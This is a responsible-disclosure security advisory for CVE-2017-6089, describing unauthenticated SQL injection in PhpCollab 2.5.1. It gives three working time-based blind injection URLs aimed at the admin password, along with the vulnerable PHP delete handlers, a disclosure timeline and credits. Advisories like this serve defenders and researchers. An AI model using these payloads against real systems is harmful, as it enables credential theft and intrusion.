PhpCollab 2.5.1 SQL Injection

`# [CVE-2017-6089] PhpCollab 2.5.1 Multiple SQL Injections (unauthenticated)  
  
## Description  
  
PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.  
  
## SQL injections  
  
The phpCollab code does not correctly filter arguments, allowing arbitrary SQL code execution by an unauthenticated user.  
  
**CVE ID**: CVE-2017-6089  
  
**Access Vector**: remote  
  
**Security Risk**: Critical  
  
**Vulnerability**: CWE-89  
  
**CVSS Base Score**: 10 (Critical)  
  
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H  
  
## Proof of Concept 1  
  
The following HTTP request allows an attacker to extract data using SQL injections in either the `project` or `id` parameter (it requires at least one topic):  
  
```  
http://phpCollab.lan/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))+and+'2'='2  
  
http://phpCollab.lan/topics/deletetopics.php?project=1&id=1+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))  
```  
  
### Vulnerable code  
  
The vulnerable code is found in `topics/deletetopics.php`, line 9.  
  
```  
if ($action == "delete") {  
$id = str_replace("**",",",$id);  
$tmpquery1 = "DELETE FROM ".$tableCollab["topics"]." WHERE id = $id";  
$tmpquery2 = "DELETE FROM ".$tableCollab["posts"]." WHERE topic = $id";  
$pieces = explode(",",$id);  
$num = count($pieces);  
connectSql("$tmpquery1");  
connectSql("$tmpquery2");  
```  
  
  
## Proof of Concept 2  
  
The following HTTP request allows an attacker to extract data using SQL injections in the `id` parameter (it requires at least one saved bookmark):  
  
```  
http://phpCollab.lan/bookmarks/deletebookmarks.php?action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)  
```  
  
### Vulnerable code  
  
The vulnerable code is found in `bookmarks/deletebookmarks.php`, line 32.  
  
```  
if ($action == "delete") {  
$id = str_replace("**",",",$id);  
$tmpquery1 = "DELETE FROM ".$tableCollab["bookmarks"]." WHERE id IN($id)";  
connectSql("$tmpquery1");  
```  
  
  
## Proof of Concept 3  
  
The following HTTP request allows an attacker to extract some information using SQL injection in the `id` parameter (it requires at least one calendar entry):  
  
```  
http://phpCollab.lan/calendar/deletecalendar.php?project=&action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)  
```  
  
### Vulnerable code  
  
The vulnerable code is found in `calendar/deletecalendar.php`, line 31.  
  
```  
if ($action == "delete") {  
$id = str_replace("**",",",$id);  
$tmpquery1 = "DELETE FROM ".$tableCollab["calendar"]." WHERE id IN($id)";  
connectSql("$tmpquery1");  
```  
  
**Notes**  
The application probably needs a security posture against injections, so other parameters and pages may be vulnerables. This advisory does not intend to be an exhaustive list of vulnerable parameters.  
  
  
## Solution  
  
Update to the latest version avalaible.  
  
## Affected versions  
  
* Version <= 2.5.1  
  
## Timeline (dd/mm/yyyy)  
  
* 27/08/2016 : Initial discovery.  
* 05/10/2016 : Initial contact.  
* 11/10/2016 : GPG Key exchange.  
* 19/10/2016 : Advisory sent to vendor.  
* 13/02/2017 : First fixes.  
* 15/02/2017 : Fixes validation by Sysdream.  
* 21/02/2017 : PhpCollab ask to wait before publish.  
* 21/06/2017 : New version has been released.  
* 29/09/2017 : Public disclosure.  
  
## Credits  
  
* Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)  
  
--   
SYSDREAM Labs <[email protected]>  
  
GPG :  
47D1 E124 C43E F992 2A2E  
1551 8EB4 8CD9 D5B2 59A1  
  
* Website: https://sysdream.com/  
* Twitter: @sysdream  
  
`